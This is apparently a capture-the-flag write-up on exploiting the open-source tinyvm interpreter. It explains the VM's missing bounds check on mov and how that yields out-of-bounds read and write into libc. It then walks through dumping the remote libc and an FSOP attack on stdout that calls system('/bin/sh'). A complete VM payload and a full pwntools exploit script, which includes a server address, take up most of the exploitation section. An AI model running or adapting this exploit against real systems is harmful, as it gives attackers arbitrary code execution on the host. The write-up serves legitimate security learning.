This is a CTF challenge called TinyVM. The author is very lazy, not wanting to write a description of the challenge, and the code is directly cloned from https://github.com/jakogut/tinyvm. So you can just
nc <host> <port>
and get flag.
Introduction #
As stated in the description, this challenge requires the participants to exploit the lastest version of an open-source virtual machine project available on GitHub. The first step is to clone the project and compile the binary with debug symbols.
make DEBUG=yes
This creates and executable called tvmi
, which probably stands for tinyvm interpreter
, since running it without arguments spits out the following error.
File was not found, or does not exist. Unable to interpret.
The remote server also asks for a file upon connection.
Input the size of the vm file you want to run(< 4096) :
Is this file supposed to be in assembly or in compiled binary? Do they use custom opcodes? Let’s read the source to find out.
The VM #
The main function creates a tvm_ctx
object, interprets the given file and runs the resulting program if no error occured.
int main(int argc, char **argv)
{
struct tvm_ctx *vm = tvm_vm_create();
if (vm != NULL && tvm_vm_interpret(vm, argv[1]) == 0)
tvm_vm_run(vm);
tvm_vm_destroy(vm);
return 0;
}
The structure tvm_ctx
contains pointers to two other structures.
struct tvm_ctx {
struct tvm_prog *prog;
struct tvm_mem *mem;
};
The tvm_prog
structure contains all the compiled instructions and their arguments.
struct tvm_prog {
int start;
int num_instr;
int *instr;
int ***args;
int **values;
int num_values;
struct tvm_htab_ctx *defines;
struct tvm_htab_ctx *label_htab;
};
The instructions are stored in an array of int
and the arguments are stored in pairs, one for each instruction.
The tvm_mem
structure is basically a wrapper around a pointer to the allocated memory region which acts as the virtual memory of the machine.
struct tvm_mem {
int FLAGS;
int remainder;
void *mem_space;
int mem_space_size;
union tvm_reg_u *registers;
};
The heart of the VM is a big switch
called on every instruction opcode.
switch (vm->prog->instr[*instr_idx]) {
/* nop */ case 0x0: break;
/* int */ case 0x1: /* unimplemented */ break;
/* mov */ case 0x2: *args[0] = *args[1]; break;
/* push */ case 0x3: tvm_stack_push(vm->mem, args[0]); break;
/* pop */ case 0x4: tvm_stack_pop(vm->mem, args[0]); break;
/* pushf */ case 0x5: tvm_stack_push(vm->mem, &vm->mem->FLAGS); break;
/* popf */ case 0x6: tvm_stack_pop(vm->mem, args[0]); break;
/* inc */ case 0x7: ++(*args[0]); break;
/* dec */ case 0x8: --(*args[0]); break;
/* add */ case 0x9: *args[0] += *args[1]; break;
/* sub */ case 0xA: *args[0] -= *args[1]; break;
/* mul */ case 0xB: *args[0] *= *args[1]; break;
/* div */ case 0xC: *args[0] /= *args[1]; break;
/* mod */ case 0xD: vm->mem->remainder = *args[0] % *args[1]; break;
/* rem */ case 0xE: *args[0] = vm->mem->remainder; break;
/* not */ case 0xF: *args[0] = ~(*args[0]); break;
/* xor */ case 0x10: *args[0] ^= *args[1]; break;
/* or */ case 0x11: *args[0] |= *args[1]; break;
/* and */ case 0x12: *args[0] &= *args[1]; break;
/* shl */ case 0x13: *args[0] <<= *args[1]; break;
/* shr */ case 0x14: *args[0] >>= *args[1]; break;
/* cmp */ case 0x15: vm->mem->FLAGS =
((*args[0] == *args[1]) | (*args[0] > *args[1]) << 1);
break;
/* call */ case 0x17: tvm_stack_push(vm->mem, instr_idx);
/* jmp */ case 0x16: *instr_idx = *args[0] - 1; break;
/* ret */ case 0x18: tvm_stack_pop(vm->mem, instr_idx);
break;
/* je */ case 0x19:
*instr_idx = (vm->mem->FLAGS & 0x1)
? *args[0] - 1 : *instr_idx;
break;
/* jne */ case 0x1A:
*instr_idx = (!(vm->mem->FLAGS & 0x1))
? *args[0] - 1 : *instr_idx;
break;
/* jg */ case 0x1B:
*instr_idx = (vm->mem->FLAGS & 0x2)
? *args[0] - 1 : *instr_idx;
break;
/* jge */ case 0x1C:
*instr_idx = (vm->mem->FLAGS & 0x3)
? *args[0] - 1 : *instr_idx;
break;
/* jl */ case 0x1D:
*instr_idx = (!(vm->mem->FLAGS & 0x3))
? *args[0] - 1 : *instr_idx;
break;
/* jle */ case 0x1E:
*instr_idx = (!(vm->mem->FLAGS & 0x2))
? *args[0] - 1 : *instr_idx;
break;
/* prn */ case 0x1F: printf("%i\n", *args[0]);
};
So the VM does indeed use custom opcodes. The comments help us recongnize standard CPU operations, except for the last one. The prn
instruction prints out its argument as an integer, which can be valuable in debugging.
An example would help better understand the inner workings of the VM. Let’s create a small assembly file and feed it to the interpreter.
mov eax, 0xdeadbeef
mov [0], eax
prn eax
When the input file is interpreted, the tvm_prog
structure is populated with the content of each instruction. Since the debugging symbols are enabled, we can directly print the content of the variables from GDB.
gef➤ p *(struct tvm_mem *)vm->mem
$1 = {
FLAGS = 0x0,
remainder = 0x0,
mem_space = 0x7ffff3db1010,
mem_space_size = 0x4000000,
registers = 0x55555555c2f0
}
The most interesting part is how the arguments are setup.
gef➤ telescope vm->prog->args
0x0000555d873a8930│+0x0000: 0x0000555d873a8890 → 0x0000555d873982f0 → 0x0000000000000000
0x0000555d873a8938│+0x0008: 0x0000555d873a88f0 → 0x00007f184f6e9010 → 0x0000000000000000
0x0000555d873a8940│+0x0010: 0x0000555d873a8910 → 0x0000555d873982f0 → 0x0000000000000000
0x0000555d873a8948│+0x0018: 0x0000000000000000
The args
field is an null-terminated array of individual heap chunks related to each instruction. If the argument is a constant, like in our first instruction, it’s also put in its own heap chunk.
gef➤ telescope vm->prog->args[0]
0x000055555556c890│+0x0000: 0x000055555555c2f0 → 0x0000000000000000
0x000055555556c898│+0x0008: 0x000055555556c8b0 → 0x00000000deadbeef
Here we can also notice that every register has its chunk, as the first argument is eax
. However, when the argument is a memory reference, like in our second instruction, the address points directly inside the vm->mem->mem_space
memory region.
gef➤ telescope vm->prog->args[1]
0x000055555556c8f0│+0x0000: 0x00007ffff3db1010 → 0x0000000000000000
0x000055555556c8f8│+0x0008: 0x000055555555c2f0 → 0x0000000000000000
It’s interesting to note that even though our program references the memory at offset 0, the argument actually points 16 bytes after the start of the memory region.
Finding the Bug #
Now that we have a better understanding of how the VM works, it’s time to break it. The vulnerability will most likely originate from the implementation of an instruction inside the big switch
. The int
instruction is interesting but it’s not yet implemented. All the other instructions don’t do anything that could lead to memory corruption, except for the mov
instruction. It doesn’t seem to have any bound check so maybe we can access memory outside the dedicated memory region? Let’s test it out!
The vm->mem
field is initialized in the tvm_vm_create
function with the value MIN_MEMORY_SIZE
which evaluates to 64*1024*1024
, or 64 MB.
struct tvm_ctx *tvm_vm_create()
{
struct tvm_ctx *vm =
(struct tvm_ctx *)calloc(1, sizeof(struct tvm_ctx));
if (!vm)
return NULL;
vm->mem = tvm_mem_create(MIN_MEMORY_SIZE);
vm->prog = tvm_prog_create();
if (!vm->mem || !vm->prog) {
tvm_vm_destroy(vm);
return NULL;
}
tvm_stack_create(vm->mem, MIN_STACK_SIZE);
return vm;
}
Inside the tvm_mem_create
function, this value is directly passed to calloc
.
struct tvm_mem *tvm_mem_create(size_t size)
{
struct tvm_mem *m =
(struct tvm_mem *)calloc(1, sizeof(struct tvm_mem));
m->registers = calloc(NUM_REGISTERS, sizeof(union tvm_reg_u));
m->mem_space_size = size;
m->mem_space = (int *)calloc(size, 1);
return m;
}
However, since the size requested is quite large, calloc
will internally use mmap
to allocate the region. This means that the region will be contiguous to the mapping of libc
, which we can confirm in GDB.
0x000055555555c000 0x000055555557d000 0x0000000000000000 rw- [heap]
0x00007ffff3db1000 0x00007ffff7db5000 0x0000000000000000 rw-
0x00007ffff7db5000 0x00007ffff7ddb000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libc.so.6
0x00007ffff7ddb000 0x00007ffff7f30000 0x0000000000026000 r-x /usr/lib/x86_64-linux-gnu/libc.so.6
0x00007ffff7f30000 0x00007ffff7f83000 0x000000000017b000 r-- /usr/lib/x86_64-linux-gnu/libc.so.6
0x00007ffff7f83000 0x00007ffff7f87000 0x00000000001ce000 r-- /usr/lib/x86_64-linux-gnu/libc.so.6
0x00007ffff7f87000 0x00007ffff7f89000 0x00000000001d2000 rw- /usr/lib/x86_64-linux-gnu/libc.so.6
There is indeed a memory region of size 0x4004000 just before libc
! We can calculate which offset inside the VM will point to the beginning of libc
.
(0x00007ffff7db5000 - 0x00007ffff3db1010) / 4 = 0x1000ffc
We must divide by 4 because each offset inside the VM points to an int
.
Let’s write a small proof-of-concept program and try to read the first value of libc
.
mov eax, [0x1000ffc]
prn eax
It does work! The printed value corresponds to the ELF magic bytes and we can also see in GDB that the argument does point to the start of libc
.
gef➤ telescope vm->prog->args[0]
0x000055555556c7a0│+0x0000: 0x000055555555c2f0 → 0x0000000000000000
0x000055555556c7a8│+0x0008: 0x00007ffff7db5000 → 0x03010102464c457f
Now we just have to transform that read/write primitive into a shell!
Exploitation #
Let’s recap what we have and what we don’t.
- We have a 4 bytes read/write primitive relative to the start of an mmaped memory region
- The binary has NX enabled, so no shellcode allowed
- The binary has ASLR and PIE enabled, so we can’t use fixed addresses
- The binary only has partial RELRO, so we can mess around with GOT entries
Let’s not forget that the whole assembly file has to be submitted at once, so we can’t leak addresses to use them afterwards. Fortunately, we have access to a wide range of assembly instructions, so we can compute differents offsets on-the-fly inside our program.
My first thought was to overwrite a GOT entry with the address of system
. However, there is no pointer inside libc
, the heap or the VM memory region that points to the binary. Therefore, with the current setup, we actually have no way to leak the base address of PIE.
I chose to opt for a similar approach that didn’t need a PIE leak. The environ
symbol inside libc
points to the stack. We can use this leak to write a simple system(/bin/sh)
ROP chain on the stack. Then, we can create an adjustable NOP sled to lead the program into it.
All these strategies require knowing the offsets of a few symbols inside libc
. However, no libc
file, no version number and not even a Dockerfile were provided with the challenge. Therefore, I decided to write a simple script to read and extract the remote libc
.
Extracting libc #
We can read and print 4 bytes at a time from the remote libc
and reconstruct it on our local machine. The only problem is that we don’t know how many bytes to read. However, we can approximate the size of the remote libc
with our own. My local libc
is version 2.36 and takes 0x1d4000 bytes in memory, so that’s how much I chose to read. Our assembly file can be at most 4096 bytes long, so we can read about 0x200 bytes at a time. I could have made a loop in assembly, but I preferred doing it in the python script.
def dump_libc(size, offset=0):
template = "mov eax, [{}]\nprn eax\n"
payload = ""
for i in range(size//4):
payload += template.format(LIBC_OFFSET + (offset//4) + i)
p.sendline(str(len(payload)).encode())
p.send(payload.encode())
p.recvuntil(b"(< 4096) : ")
result = p.recvall()
with open("libc.so.6", "ab") as f:
for line in result.decode().splitlines():
value = int(line)
if value < 0:
value = value + 0x100000000
f.write(p32(value))
total_size = 0
while total_size < 0x1d4000:
print(f"[*] dumping from offset {total_size}")
p = remote(HOST, PORT)
dump_libc(0x200, total_size)
total_size += 0x200
In restrospect, this wasn’t the smartest way to go about it. All I really wanted was the version string, located near the end of libc
. It can be found quickly with strings
.
strings libc.so.6 | grep LIBC
Unfortunately, it wasn’t inside the extracted libc
. This probably meant that the remote version was a little bigger than my local version. Therefore, I continued extracting 0x1000 bytes at a time until it finally appeared.
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35
We can deduce from that version that the server is probably using an Ubuntu 22.04 docker instance.
Afterwards, I used readelf -n
to retreive the build ID and I downloaded the corresponding libc
from the amazing
libc database.
curl -X POST -H 'Content-Type: application/json' --data '{"buildid": "69389d485a9793dbe873f0ea2c93e02efaa9aa3d"}' 'https://libc.rip/api/find'
Great! Now we can use the symbols to craft a ROP chain and get a shell, right? Well, it’s not as simple as that. Unfortunately, the VM is 32 bits, which means that the furthest offset we can access with our read/write primitive is 0xffffffff. Since the host system is 64 bits, the randomized addresses of memory regions are usually more than 0xffffffff bytes apart. This means that we can’t access the stack, the GOT or even the heap. Therefore, our only target for exploitation is libc
(and maybe ld
but we won’t need it).
In the past, we might have tried to setup a malicious __free_hook
or something similar to get a shell. However, these are disabled in GLIBC 2.35, which leaves us with only one option…
Update #
I later came accross this
exploit script which corrupts the internal GOT entries of libc
to get a shell. It also uses multiple operations on esp
to access offsets greater than 0xffffffff. Very clever!
FSOP #
File Stream Oriented Programming (FSOP) is a technique that uses internal libc
structures to get code execution from memory corruption. The fact that it only relies on libc
makes it perfect for this scenario.
I won’t go into too much details about the technique here because I’m planning on writing an in-depth post about FSOP later.
Before doing anything, we need to target a specific file stream. Since the prn
opcode calls printf
, we can use stdout
. It’s preferable to initialize all the buffers inside stdout
before messing with it, which we can do by calling printf
once.
mov eax, 1
prn eax
Then, we have a few values to put in specific places. I chose to use the path inside _IO_wfile_underflow
and __libio_codecvt_in
. We have to change _flags
to pass the _IO_NO_READS
check.
mov [{stdout_flags}], 0xfbad2a80
We also need to make sure that _IO_read_ptr
is lower than _IO_read_end
. Since both pointers are initialized, we only need to mask the lower 32 bits of _IO_read_ptr
.
mov [{stdout_read_ptr}], 0
The address that’s eventually going to be called will be stored in rbp
. This value comes from r13
with the instruction mov rbp,QWORD PTR [r13+0x28]
. However, r13
must point to a NULL value to skip a call to PTR_DEMANGLE
which would segfault. Therefore, we can make r13
point to an unused part of the stdout
structure. The value of r13
comes from rdi
with the instruction mov r13, QWORD PTR [rdi]
. Therefore, we can also put the address of r13
inside the stdout
structure and make rdi
point to it. All the addresses used are offsets of the stdout
structure, whose address is stored at the _IO_2_1_stdout_
symbol. Therefore, we can calculate all the addresses we need by adding offsets to this value. Since the VM registers are only 32 bits, we need 2 mov
instructions to copy a 64 bits address.
mov eax, [{stdout+1}]
mov [{stdout_r13+1}], eax
mov eax, [{stdout}]
add eax, {r13_offset}
mov [{stdout_r13}], eax
The value of rdi
is actually the _codecvt
field of stdout
. We can replace it with a pointer to our desired r13
value.
mov eax, [{stdout+1}]
mov [{stdout_codecvt+1}], eax
mov eax, [{stdout}]
add eax, {rdi_offset}
mov [{stdout_codecvt}], eax
We can finally put the payload target address in [r13+0x28]
. The address of system
would be perfect because we could just make rdi
point to /bin/sh
and we would get a shell. However, rdi
needs to point to the value of r13
. Instead, we can use a nifty little gadget to modify the value of rdi
afterwards.
add rdi, 0x10
jmp rcx
We just have to manually put the string /bin/sh
at the right spot.
mov [{stdout_binsh}], 0x6e69622f
mov [{stdout_binsh+1}], 0x0068732f
Then, we can put the address of the gadget at [r13+0x28]
.
mov eax, [{stdout+1}]
mov [{stdout_rbp+1}], eax
mov eax, [{stdout}]
sub eax, {gadget_offset}
mov [{stdout_rbp}], eax
The address of system
now has to go in rcx
, which comes from the _IO_read_end
field of stdout
.
mov eax, [{stdout+1}]
mov [{stdout_read_end+1}], eax
mov eax, [{stdout}]
sub eax, {system_offset}
mov [{stdout_read_end}], eax
Finally, we can modify the vtable
pointer at the end of stdout
to make _IO_file_xsgetn
, called internally by printf
, point to _IO_wfile_underflow
.
mov eax, [{stdout_vtable}]
sub eax, {vtable_offset}
mov [{stdout_vtable}], eax
We just need to call printf
again to get a shell!
prn eax
Here is the complete payload for the remote instance. The actual values will vary from one version of libc
to another.
mov eax, 1
prn eax
mov [17332700], 0xfbad2a80
mov [17332702], 0
mov eax, [17332759]
mov [17332717], eax
mov eax, [17332758]
add eax, 72
mov [17332716], eax
mov eax, [17332759]
mov [17332705], eax
mov eax, [17332758]
sub eax, 1874464
mov [17332704], eax
mov eax, [17332759]
mov [17332739], eax
mov eax, [17332758]
add eax, 64
mov [17332738], eax
mov eax, [17332759]
mov [17332729], eax
mov eax, [17332758]
sub eax, 749392
mov [17332728], eax
mov [17332722], 0x6e69622f
mov [17332723], 0x0068732f
mov eax, [17332754]
sub eax, 1368
mov [17332754], eax
prn eax
In the end, this wasn’t a very difficult challenge, but I think it was quite harder than the one I solved last year, so that’s progress! As always, the Real World CTF is a great opportunity to learn.
Full Exploit Script #
#!/usr/bin/python3
from pwn import *
import os
REMOTE = False
NAME = "tvmi"
if REMOTE or args["REMOTE"]:
p = remote(HOST, PORT)
libc = ELF("./libc.so.6")
gadget_addr = 0x0000000000163830
else:
p = None
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
gadget_addr = 0x000000000014023c
LIBC_OFFSET = 0x1000ffc
def dump_libc(size, offset=0):
template = "mov eax, [{}]\nprn eax\n"
payload = ""
for i in range(size//4):
payload += template.format(LIBC_OFFSET + (offset//4) + i)
p.sendline(str(len(payload)).encode())
p.send(payload.encode())
p.recvuntil(b"(< 4096) : ")
result = p.recvall()
with open("libc.so.6", "ab") as f:
for line in result.decode().splitlines():
value = int(line)
if value < 0:
value = value + 0x100000000
f.write(p32(value))
DUMP = False
if DUMP or args["DUMP"]:
# Dump mode
os.remove("libc.so.6")
total_size = 0
while total_size < 0x1dd000:
print(f"[*] dumping from offset {total_size}")
dump_libc(0x200, total_size)
total_size += 0x200
p = remote("198.11.180.84", 6666)
else:
# Exploit mode
vtable_offset = (libc.sym["_IO_file_jumps"] - libc.sym["_IO_wfile_jumps"] + 24)
# Convert addresses to VM memory offsets
stdout = LIBC_OFFSET + (libc.sym["stdout"]//4)
stdout_flags = LIBC_OFFSET + (libc.sym["_IO_2_1_stdout_"]//4)
stdout_read_ptr = LIBC_OFFSET + ((libc.sym["_IO_2_1_stdout_"] + (8*1))//4)
stdout_read_end = LIBC_OFFSET + ((libc.sym["_IO_2_1_stdout_"] + (8*2))//4)
stdout_r13 = LIBC_OFFSET + ((libc.sym["_IO_2_1_stdout_"] + (8*8))//4)
stdout_binsh = LIBC_OFFSET + ((libc.sym["_IO_2_1_stdout_"] + (8*11))//4)
stdout_rbp = LIBC_OFFSET + ((libc.sym["_IO_2_1_stdout_"] + (8*14))//4)
stdout_codecvt = LIBC_OFFSET + ((libc.sym["_IO_2_1_stdout_"] + (8*19))//4)
stdout_vtable = LIBC_OFFSET + ((libc.sym["_IO_2_1_stdout_"] + (8*27))//4)
# Calculate offsets to add or substract
rdi_offset = 8*8 # [rdi] = r13
r13_offset = 8*9 # [r13] = 0
system_offset = libc.sym["_IO_2_1_stdout_"] - libc.sym["system"]
gadget_offset = libc.sym["_IO_2_1_stdout_"] - gadget_addr
# Craft the payload
payload = f"""mov eax, 1
prn eax
mov [{stdout_flags}], 0xfbad2a80
mov [{stdout_read_ptr}], 0
mov eax, [{stdout+1}]
mov [{stdout_r13+1}], eax
mov eax, [{stdout}]
add eax, {r13_offset}
mov [{stdout_r13}], eax
mov eax, [{stdout+1}]
mov [{stdout_read_end+1}], eax
mov eax, [{stdout}]
sub eax, {system_offset}
mov [{stdout_read_end}], eax
mov eax, [{stdout+1}]
mov [{stdout_codecvt+1}], eax
mov eax, [{stdout}]
add eax, {rdi_offset}
mov [{stdout_codecvt}], eax
mov eax, [{stdout+1}]
mov [{stdout_rbp+1}], eax
mov eax, [{stdout}]
sub eax, {gadget_offset}
mov [{stdout_rbp}], eax
mov [{stdout_binsh}], 0x6e69622f
mov [{stdout_binsh+1}], 0x0068732f
mov eax, [{stdout_vtable}]
sub eax, {vtable_offset}
mov [{stdout_vtable}], eax
prn eax""".encode()
if p is None:
with open("prog.txt", "wb") as f:
f.write(payload)
print("Payload written to prog.txt")
else:
p.recvuntil(b"(< 4096) : ")
p.sendline(str(len(payload)).encode())
p.send(payload)
p.interactive()